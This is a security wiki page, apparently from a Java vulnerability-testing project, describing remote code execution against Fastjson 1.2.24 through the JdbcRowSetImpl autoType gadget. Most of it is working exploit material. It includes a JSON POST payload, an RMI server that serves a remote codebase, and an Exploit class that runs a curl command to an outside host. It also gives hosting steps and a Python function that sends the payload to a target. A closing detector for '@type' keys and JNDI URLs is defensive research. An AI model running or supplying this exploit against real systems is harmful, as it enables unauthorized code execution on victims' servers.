Fastjson
JoyChou edited this page Oct 22, 2018 · 5 revisions
First, exploitation via JdbcRowSetImpl. Fastjson resolves the `@type` key to the class to instantiate and then calls the matching setters: `setDataSourceName()` stores the JNDI name, and `setAutoCommit(true)` calls `connect()`, which performs a JNDI lookup of that name and so reaches out to the attacker-controlled RMI registry. The conditions for this EXP are very strict and all sorts of problems come up: the RMI address may be unreachable, certain Java versions cannot be exploited (from JDK 8u121 on, `com.sun.jndi.rmi.object.trustURLCodebase` defaults to false, so the JNDI client no longer loads the factory class from a remote codebase), and Fastjson 1.2.25 and later do not enable autoType by default. The vulnerable environment I tested the EXP in:
- Java 1.8.0_102
- Fastjson 1.2.24
POST body:

```json
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://test.joychou.org:1099/Exploit","autoCommit":true}
```
JNDIServer.java

```java
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class JNDIServer {
    public static void main(String[] args) throws Exception {
        // RMI registry that the victim's JNDI lookup of rmi://...:1099/Exploit connects to
        Registry registry = LocateRegistry.createRegistry(1099);
        // Reference(className, factoryClassName, factoryLocation): the victim's JNDI client
        // fetches Exploit.class from the codebase URL and instantiates it
        Reference reference =
                new Reference("Exploit", "Exploit", "http://test.joychou.org:8888/");
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
        // Bind the reference under the name used in the payload's dataSourceName
        registry.bind("Exploit", referenceWrapper);
    }
}
```
Exploit.java

```java
// Loaded from the codebase URL and instantiated by the victim's JNDI client;
// the command runs inside the constructor
public class Exploit {
    public Exploit() {
        try {
            // Command to execute
            String commands = "curl http://test.joychou.org/fastjson";
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    // Optional local run to confirm the command works
    public static void main(String[] argv) {
        Exploit e = new Exploit();
    }
}
```
Exploitation steps:

- Stand up a JNDI server:

```sh
javac JNDIServer.java
java JNDIServer
```

- Compile the class carrying the command to execute and serve it over HTTP (the codebase URL in the Reference must point at the directory containing Exploit.class; `java Exploit` only runs the command locally as a check):

```sh
javac Exploit.java
java Exploit
python -m SimpleHTTPServer 8888
```

- Submit the POST EXP with Content-Type set to

```
Content-Type: application/json
```
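The following Python is an added example, not code from the wiki page or from the java-sec-code project. It builds the JdbcRowSetImpl payload from the page for an arbitrary JNDI name, shows the exact POST the last step sends (the target URL `http://victim.example/json` is a placeholder), and, for the defensive side, walks a JSON body and flags the two indicators a detection engineer would look for in request logs: an `@type` key (Fastjson autoType) and any string value that is a JNDI URL. The sample bodies are constructed for the example.

```python
import json
import urllib.request

# Class named in the page's payload: setDataSourceName() stores the JNDI name and
# setAutoCommit(true) triggers connect(), which performs the JNDI lookup.
TARGET_CLASS = "com.sun.rowset.JdbcRowSetImpl"

# URL schemes a JNDI lookup will follow to a remote server (rmi on the page; the
# others are the usual alternatives seen in Fastjson payloads).
JNDI_SCHEMES = ("rmi://", "ldap://", "ldaps://", "iiop://")


def build_payload(jndi_url: str) -> str:
    """Return the compact JdbcRowSetImpl JSON body for the given JNDI name."""
    body = {
        "@type": TARGET_CLASS,
        "dataSourceName": jndi_url,
        "autoCommit": True,
    }
    return json.dumps(body, separators=(",", ":"))


def send_payload(target_url: str, jndi_url: str, timeout: float = 5.0) -> int:
    """POST the payload with Content-Type: application/json; returns the HTTP status.
    Not called below: it needs a live target and JNDI server (assumed, not on the page)."""
    data = build_payload(jndi_url).encode()
    req = urllib.request.Request(
        target_url, data=data, method="POST",
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


def find_jndi_indicators(body: str) -> list:
    """Recursively walk a JSON document and return (json_path, reason) findings.
    Non-JSON input yields no findings rather than an exception."""
    findings = []
    try:
        doc = json.loads(body)
    except ValueError:
        return findings

    def walk(node, path):
        if isinstance(node, dict):
            for key, value in node.items():
                here = f"{path}.{key}" if path else key
                if key == "@type":
                    findings.append((here, f"autoType key requesting {value}"))
                if isinstance(value, str) and value.lower().startswith(JNDI_SCHEMES):
                    findings.append((here, f"JNDI URL {value}"))
                walk(value, here)
        elif isinstance(node, list):
            for i, value in enumerate(node):
                walk(value, f"{path}[{i}]")

    walk(doc, "")
    return findings


# Constructed sample bodies: the page's payload, a benign request, and a payload
# buried inside a nested array as it might appear in a real API.
SAMPLE_BODIES = [
    build_payload("rmi://test.joychou.org:1099/Exploit"),
    '{"name":"bob","autoCommit":true}',
    '{"user":{"name":"bob","prefs":[{"@type":"x","dataSourceName":"LDAP://evil:1389/a"}]}}',
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        for path, reason in find_jndi_indicators(body):
            print(f"{path}: {reason}")
```

The detector keys on structure rather than on the class name, so it also flags payloads that swap JdbcRowSetImpl for another gadget or use an LDAP reference; a WAF rule written only against the literal `com.sun.rowset.JdbcRowSetImpl` would miss both.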